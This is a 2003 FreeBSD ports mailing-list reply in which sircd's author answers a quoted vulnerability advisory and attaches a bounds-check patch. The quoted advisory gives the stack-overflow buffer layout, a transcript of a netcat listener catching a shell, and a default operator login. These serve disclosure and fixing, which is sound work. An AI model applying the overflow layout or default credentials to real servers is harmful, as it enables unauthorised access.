From owner-freebsd-ports Tue Feb 4 2:34:47 2003 Delivered-To: freebsd-ports@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AD23837B401 for ; Tue, 4 Feb 2003 02:34:42 -0800 (PST) Received: from smtp-relay2.barrysworld.com (smtp-relay2.barrysworld.com [213.221.172.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id ACB5D43F75 for ; Tue, 4 Feb 2003 02:34:41 -0800 (PST) (envelope-from zarjazz@barrysworld.com) Received: from [213.221.181.50] (helo=barrysworld.com) by smtp-relay2.barrysworld.com with esmtp (Exim 4.12) id 18g0PA-0008AV-00; Tue, 04 Feb 2003 10:34:16 +0000 Received: from barrysworld.com [195.149.46.33] by barrysworld.com with ESMTP (SMTPD32-7.13) id A790550501C2; Tue, 04 Feb 2003 10:36:00 +0000 Message-ID: <3E3F975C.9070109@barrysworld.com> Date: Tue, 04 Feb 2003 10:35:08 +0000 From: Zarjazz User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-gb, en MIME-Version: 1.0 To: =?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?= Cc: ports@freebsd.org Subject: Re: sircd buffer overflow References: <002901c2cbd0$1ded9220$24029dd9@tuborg> In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg> X-Enigmail-Version: 0.71.0.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig0C38CDF729303AEFC707DCD5" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enig0C38CDF729303AEFC707DCD5 Content-Type: multipart/mixed; boundary="------------070609010800040607000708" This is a multi-part message in MIME format. --------------070609010800040607000708 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Thanks for the info but I'd like to say that the BSD ports version of sircd is / was nothing to do with me and v0.4.0 was the initial alpha release and is now more than 1 year old compared to the current CVS tree so someone has not been keeping the source upto date! > II. DESCRIPTION > > a: Insufficient bounds checking leads to execution of arbitrary code. Patch attached to sanity check the dns lookup however I see this more as a bug than an exploit as you need root access on the system before you actually edit /etc/hosts in the first place. I would be interested to know if the current CVS version is affected in the same way as a lot has change since the 0.4.x tree. > b: Default oper account matching *!*@* In all my releases I only ever included an example.conf file under docs/ so I can't take the blame for anyone running a server with an unaltered config file :) Zarjazz Knud Erik Højgaard wrote: > A heads up.. > > > ------------------------------------------------------------------------ > > I. BACKGROUND > > According to the vendor "The 'sircd' project started as an idea from > the QuakeNet IRC Network coding team to develop a completely new irc > server that had none of the problems of the original ircd, such as > instability, scalability issues, redundant, badly written code and > other nasty things. " > More info is available at http://www.sircd.org. > > II. DESCRIPTION > > a: Insufficient bounds checking leads to execution of arbitrary code. > b: Default oper account matching *!*@* > > III. ANALYSIS > > a: > Upon checking the reverse dns of a connecting user, if the returned > value is longer than a certain length a classic stack overflow occurs. > > The buffer may be constructed as such: > [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode], > leaving us with plenty of space both before and after eip to store our > shellcode. > > The accompanying .sh script is a silly proof of concept. > Below is a fabricated copy of a typical run: > > [shell 1] > $ nc -l -v -p 10000 > listening on [any] 10000 ... > > [shell 2] > # ./sircd.sh 127.0.0.1 > > sircd 0.4.0 proof-of-concept, usage ./sircd.sh > > UID check passed, backing up /etc/hosts > Now connect to the sircd from 127.0.0.1 > Press a key and enter to restore /etc/hosts > asd > Game over man, game over > # > > [shell 3] > $ sircd & > [1] 75711 > $ > > ===================================== > sircd: v0.4.0 Alpha > Author(s) > Zarjazz (zarjazz@barrysworld.com) > ===================================== > sircd initialized > SSL initialized > > $ BitchX 127.0.0.1 > [snip some bitchx output] > [fi] *** Welcome to the_server > [fi] *** Resolving IP 127.0.0.1 > --from here on the connection freezes. > > [shell 2] > fah > Game over man, game over > # > > [shell 1] > connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869 > id > uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user) > > b: type /oper bod bod bod in a connected irc-client. > > IV. DETECTION > > sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org > as per 03/02-03 is found to be vulnerable. > > V. WORKAROUND > > unknown > > VI. VENDOR FIX > > unknown > > VII. CVE INFORMATION > > unknown > > VIII. DISCLOSURE TIMELINE > > 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified. > > IX. CREDIT > > Knud Erik Højgaard --------------070609010800040607000708 Content-Type: text/plain; name="sircd.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sircd.patch" diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c --- sircd-0.4.0/sircd/src/ircd_callbacks.c Sat Feb 2 17:44:49 2002 +++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c Tue Feb 4 10:12:37 2003 @@ -314,7 +314,7 @@ { /* not cached, so do a dns lookup of the ip address */ struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET); - if (host_ent) + if (host_ent && host_ent->h_length < HOSTLEN) ip_tree->left = (void *) str_dup(host_ent->h_name); else ip_tree->left = (void *) str_dup(cl_ip); --------------070609010800040607000708-- --------------enig0C38CDF729303AEFC707DCD5 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (MingW32) iD8DBQE+P5diPx/nyuA99rgRAgFnAJ4/hTRCoihNONNatt0GVKNhbvPPVQCfYY3t RuvNyXleBQHkTqNAW+BCVTE= =DsDa -----END PGP SIGNATURE----- --------------enig0C38CDF729303AEFC707DCD5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message